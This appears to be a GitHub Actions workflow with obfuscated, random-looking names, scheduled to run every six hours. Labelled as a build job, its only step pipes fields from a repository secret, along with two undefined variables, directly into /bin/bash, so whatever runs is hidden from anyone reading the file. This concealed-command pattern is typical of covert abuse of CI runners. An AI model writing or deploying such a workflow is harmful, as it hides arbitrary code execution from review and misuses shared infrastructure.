name: xuetaoqing6634

on:
  workflow_dispatch:
  schedule:
    - cron: '20 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xuetaoqing6634
        env:
          hk7586: ${{ secrets.hk7586 }}
        run: |
          echo $hk7586 | jq -r .kfxge889 | /bin/bash
          echo $uxxdn91450 | jq -r .k933 | /bin/bash
          echo $hgf51384 | jq -r .qbmqv07301 | /bin/bash

